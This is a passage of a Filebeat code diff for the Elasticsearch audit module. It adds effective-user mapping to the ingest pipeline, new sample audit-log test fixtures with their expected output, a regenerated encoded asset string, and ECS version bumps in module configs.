b/filebeat/module/elasticsearch/audit/ingest/pipeline.yml index ec3873d2b9fb..1ae5da8dbb76 100644 --- a/filebeat/module/elasticsearch/audit/ingest/pipeline.yml +++ b/filebeat/module/elasticsearch/audit/ingest/pipeline.yml @@ -55,6 +55,10 @@ processors: field: related.user value: "{{user.name}}" if: "ctx?.user?.name != null" +- append: + field: related.user + value: "{{user.effective.name}}" + if: "ctx?.user?.effective?.name != null" - remove: field: elasticsearch.audit.@timestamp - remove: diff --git a/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json b/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json index f8127900e70e..66f14a2381ca 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json +++ b/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json @@ -23,6 +23,27 @@ "source.port": 40380, "url.original": "/" }, + { + "@timestamp": "2019-06-11T15:03:32.777Z", + "elasticsearch.audit.component": "o.e.x.s.a.AuthenticationService", + "elasticsearch.audit.message": "Authentication of [elastic] was terminated by realm [reserved] - failed to authenticate user [elastic]", + "elasticsearch.cluster.name": "docker-cluster", + "elasticsearch.cluster.uuid": "xEiKc6ipRiyzU8_8czXrJw", + "elasticsearch.node.id": "Xaq2BFVcQ1OhyMrjL8gNOg", + "elasticsearch.node.name": "dff7befc418f", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "Xaq2BFVcQ1OhyMrjL8gNOg", + "input.type": "log", + "log.level": "INFO", + "log.offset": 299, + "message": "{\"type\": \"server\", \"timestamp\": \"2019-06-11T15:03:32,777+0000\", \"level\": \"INFO\", \"component\": \"o.e.x.s.a.AuthenticationService\", \"cluster.name\": \"docker-cluster\", \"node.name\": \"dff7befc418f\", \"cluster.uuid\": \"xEiKc6ipRiyzU8_8czXrJw\", \"node.id\": \"Xaq2BFVcQ1OhyMrjL8gNOg\", \"message\": \"Authentication of [elastic] was terminated by realm [reserved] - failed to authenticate user [elastic]\" }", + "service.type": "elasticsearch" + }, { "@timestamp": "2019-06-11T15:03:32.778Z", "elasticsearch.audit.layer": "rest", diff --git a/filebeat/module/elasticsearch/audit/test/test-audit.log b/filebeat/module/elasticsearch/audit/test/test-audit.log index 4937ec8ef76d..e775723f5bb0 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit.log +++ b/filebeat/module/elasticsearch/audit/test/test-audit.log @@ -5,3 +5,10 @@ {"@timestamp":"2018-10-31T09:35:12,303", "node.id":"DSiWcTyeThWtUXLB9J0BMw", "event.type":"transport", "event.action":"access_granted", "user.name":"elastic", "user.realm":"reserved", "user.roles":["superuser"], "origin.type":"rest","origin.address":"[::1]:61711", "action":"cluster:admin/xpack/security/user/change_password", "request.name":"ChangePasswordRequest"} {"@timestamp":"2018-10-31T09:35:12,314", "node.id":"DSiWcTyeThWtUXLB9J0BMw", "event.type":"transport", "event.action":"access_granted", "user.name":"_xpack_security", "user.realm":"__attach", "user.roles":["superuser"], "origin.type":"local_node", "origin.address":"127.0.0.1:9300", "action":"indices:admin/create", "request.name":"CreateIndexRequest", "indices":[".security-6"]} {"@timestamp":"2019-01-27T20:15:10,380", "node.name":"node-0", "node.id":"y8fa3M5zSSGo1M_KJRMUXw", "event.type":"rest", "event.action":"authentication_success", "user.name":"elastic-admin", "origin.type":"rest", "origin.address":"[::1]:58955", "realm":"default_file", "url.path":"/_search", "request.method":"GET", "request.body":"\n{\n \"query\" : {\n \"term\" : { \"user\" : \"kimchy\" }\n }\n}\n", "request.id":"WzL_kb6VSvOhAq0twPvHOQ"} +{"type":"audit", "timestamp":"2020-12-30T23:17:28,308+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"change_disable_user", "request.id":"qvLIgw_eTvyK3cgV-GaLVg", "change":{"disable":{"user":{"name":"user1"}}}} +{"type":"audit", "timestamp":"2020-12-30T23:17:34,843+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"change_enable_user", "request.id":"BO3QU3qeTb-Ei0G0rUOalQ", "change":{"enable":{"user":{"name":"user1"}}}} +{"type":"audit", "timestamp":"2020-12-30T22:19:41,345+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"delete_user", "request.id":"au5a1Cc3RrebDMitMGGNCw", "delete":{"user":{"name":"jacknich"}}} +{"type":"audit", "timestamp":"2020-12-31T00:36:30,247+0200", "node.id":"9clhpgjJRR-iKzOw20xBNQ", "event.type":"security_config_change", "event.action":"invalidate_apikeys", "request.id":"7lyIQU9QTFqSrTxD0CqnTQ", "invalidate":{"apikeys":{"owned_by_authenticated_user":false,"user":{"name":"myuser","realm":"native1"}}}} +{"type":"audit", "timestamp":"2020-12-30T22:10:09,749+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"put_user", "request.id":"VIiSvhp4Riim_tpkQCVSQA", "put":{"user":{"name":"user1","enabled":false,"roles":["admin","other_role1"],"full_name":"Jack Sparrow","email":"jack@blackpearl.com","has_password":true,"metadata":{"cunning":10}}}} +{"type":"audit", "timestamp":"2020-12-30T22:49:34,859+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"transport", "event.action":"run_as_denied", "user.name":"user1", "user.run_as.name":"user1", "user.realm":"default_native", "user.run_as.realm":"default_native", "user.roles":["test_role"], "origin.type":"rest", "origin.address":"[::1]:52662", "request.id":"RcaSt872RG-R_WJBEGfYXA", "action":"indices:data/read/search", "request.name":"SearchRequest", "indices":["alias1"]} +{"type":"audit", "timestamp":"2020-12-30T22:44:42,068+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"transport", "event.action":"run_as_granted", "user.name":"elastic", "user.run_as.name":"user1", "user.realm":"reserved", "user.run_as.realm":"default_native", "user.roles":["superuser"], "origin.type":"rest", "origin.address":"[::1]:52623", "request.id":"dGqPTdEQSX2TAPS3cvc1qA", "action":"indices:data/read/search", "request.name":"SearchRequest", "indices":["alias1"]} diff --git a/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json b/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json index 96795c1550c0..ce89459bd51f 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json +++ b/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json @@ -216,5 +216,197 @@ "source.port": 58955, "url.original": "/_search", "user.name": "elastic-admin" + }, + { + "@timestamp": "2020-12-30T21:17:28.308Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "qvLIgw_eTvyK3cgV-GaLVg", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "change_disable_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 2509, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T23:17:28,308+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"change_disable_user\", \"request.id\":\"qvLIgw_eTvyK3cgV-GaLVg\", \"change\":{\"disable\":{\"user\":{\"name\":\"user1\"}}}}", + "related.user": [ + "user1" + ], + "service.type": "elasticsearch", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T21:17:34.843Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "BO3QU3qeTb-Ei0G0rUOalQ", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "change_enable_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 2770, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T23:17:34,843+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"change_enable_user\", \"request.id\":\"BO3QU3qeTb-Ei0G0rUOalQ\", \"change\":{\"enable\":{\"user\":{\"name\":\"user1\"}}}}", + "related.user": [ + "user1" + ], + "service.type": "elasticsearch", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T20:19:41.345Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "au5a1Cc3RrebDMitMGGNCw", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "delete_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 3029, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:19:41,345+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"delete_user\", \"request.id\":\"au5a1Cc3RrebDMitMGGNCw\", \"delete\":{\"user\":{\"name\":\"jacknich\"}}}", + "related.user": [ + "jacknich" + ], + "service.type": "elasticsearch", + "user.name": "jacknich" + }, + { + "@timestamp": "2020-12-30T22:36:30.247Z", + "elasticsearch.audit.invalidate.apikeys.owned_by_authenticated_user": false, + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "7lyIQU9QTFqSrTxD0CqnTQ", + "elasticsearch.audit.user.realm": "native1", + "elasticsearch.node.id": "9clhpgjJRR-iKzOw20xBNQ", + "event.action": "invalidate_apikeys", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "9clhpgjJRR-iKzOw20xBNQ", + "input.type": "log", + "log.offset": 3273, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-31T00:36:30,247+0200\", \"node.id\":\"9clhpgjJRR-iKzOw20xBNQ\", \"event.type\":\"security_config_change\", \"event.action\":\"invalidate_apikeys\", \"request.id\":\"7lyIQU9QTFqSrTxD0CqnTQ\", \"invalidate\":{\"apikeys\":{\"owned_by_authenticated_user\":false,\"user\":{\"name\":\"myuser\",\"realm\":\"native1\"}}}}", + "related.user": [ + "myuser" + ], + "service.type": "elasticsearch", + "user.name": "myuser" + }, + { + "@timestamp": "2020-12-30T20:10:09.749Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "VIiSvhp4Riim_tpkQCVSQA", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "put_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 3592, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:10:09,749+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"put_user\", \"request.id\":\"VIiSvhp4Riim_tpkQCVSQA\", \"put\":{\"user\":{\"name\":\"user1\",\"enabled\":false,\"roles\":[\"admin\",\"other_role1\"],\"full_name\":\"Jack Sparrow\",\"email\":\"jack@blackpearl.com\",\"has_password\":true,\"metadata\":{\"cunning\":10}}}}", + "related.user": [ + "user1" + ], + "service.type": "elasticsearch", + "user.email": "jack@blackpearl.com", + "user.full_name": "Jack Sparrow", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T20:49:34.859Z", + "elasticsearch.audit.action": "indices:data/read/search", + "elasticsearch.audit.indices": [ + "alias1" + ], + "elasticsearch.audit.layer": "transport", + "elasticsearch.audit.origin.type": "rest", + "elasticsearch.audit.request.id": "RcaSt872RG-R_WJBEGfYXA", + "elasticsearch.audit.request.name": "SearchRequest", + "elasticsearch.audit.user.realm": "default_native", + "elasticsearch.audit.user.roles": [ + "test_role" + ], + "elasticsearch.audit.user.run_as.name": "user1", + "elasticsearch.audit.user.run_as.realm": "default_native", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "run_as_denied", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 3978, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:49:34,859+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"transport\", \"event.action\":\"run_as_denied\", \"user.name\":\"user1\", \"user.run_as.name\":\"user1\", \"user.realm\":\"default_native\", \"user.run_as.realm\":\"default_native\", \"user.roles\":[\"test_role\"], \"origin.type\":\"rest\", \"origin.address\":\"[::1]:52662\", \"request.id\":\"RcaSt872RG-R_WJBEGfYXA\", \"action\":\"indices:data/read/search\", \"request.name\":\"SearchRequest\", \"indices\":[\"alias1\"]}", + "related.user": [ + "user1", + "user1" + ], + "service.type": "elasticsearch", + "source.address": "[::1]:52662", + "source.ip": "::1", + "source.port": 52662, + "user.effective.name": "user1", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T20:44:42.068Z", + "elasticsearch.audit.action": "indices:data/read/search", + "elasticsearch.audit.indices": [ + "alias1" + ], + "elasticsearch.audit.layer": "transport", + "elasticsearch.audit.origin.type": "rest", + "elasticsearch.audit.request.id": "dGqPTdEQSX2TAPS3cvc1qA", + "elasticsearch.audit.request.name": "SearchRequest", + "elasticsearch.audit.user.realm": "reserved", + "elasticsearch.audit.user.roles": [ + "superuser" + ], + "elasticsearch.audit.user.run_as.name": "user1", + "elasticsearch.audit.user.run_as.realm": "default_native", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "run_as_granted", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "success", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 4463, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:44:42,068+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"transport\", \"event.action\":\"run_as_granted\", \"user.name\":\"elastic\", \"user.run_as.name\":\"user1\", \"user.realm\":\"reserved\", \"user.run_as.realm\":\"default_native\", \"user.roles\":[\"superuser\"], \"origin.type\":\"rest\", \"origin.address\":\"[::1]:52623\", \"request.id\":\"dGqPTdEQSX2TAPS3cvc1qA\", \"action\":\"indices:data/read/search\", \"request.name\":\"SearchRequest\", \"indices\":[\"alias1\"]}", + "related.user": [ + "elastic", + "user1" + ], + "service.type": "elasticsearch", + "source.address": "[::1]:52623", + "source.ip": "::1", + "source.port": 52623, + "user.effective.name": "user1", + "user.name": "elastic" } ] \ No newline at end of file diff --git a/filebeat/module/elasticsearch/deprecation/config/log.yml b/filebeat/module/elasticsearch/deprecation/config/log.yml index 7730827c5b4b..62e291e30de5 100644 --- a/filebeat/module/elasticsearch/deprecation/config/log.yml +++ b/filebeat/module/elasticsearch/deprecation/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/elasticsearch/fields.go b/filebeat/module/elasticsearch/fields.go index 4f44e586a19d..66aae291f49f 100644 --- a/filebeat/module/elasticsearch/fields.go +++ b/filebeat/module/elasticsearch/fields.go @@ -32,5 +32,5 @@ func init() { // AssetElasticsearch returns asset data. // This is the base64 encoded gzipped contents of module/elasticsearch. func AssetElasticsearch() string { - return "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" + return "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" } diff --git a/filebeat/module/elasticsearch/gc/config/gc.yml b/filebeat/module/elasticsearch/gc/config/gc.yml index 67967e20abc3..ba6d4dceefd3 100644 --- a/filebeat/module/elasticsearch/gc/config/gc.yml +++ b/filebeat/module/elasticsearch/gc/config/gc.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/elasticsearch/server/config/log.yml b/filebeat/module/elasticsearch/server/config/log.yml index c784b5996fe3..1723c9c86b6c 100644 --- a/filebeat/module/elasticsearch/server/config/log.yml +++ b/filebeat/module/elasticsearch/server/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml index 010a828ce8e7..6b57b280a257 100644 --- a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml +++ b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/haproxy/log/config/file.yml b/filebeat/module/haproxy/log/config/file.yml index 19f230a3247d..1fc1e5a33c70 100644 --- a/filebeat/module/haproxy/log/config/file.yml +++ b/filebeat/module/haproxy/log/config/file.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' 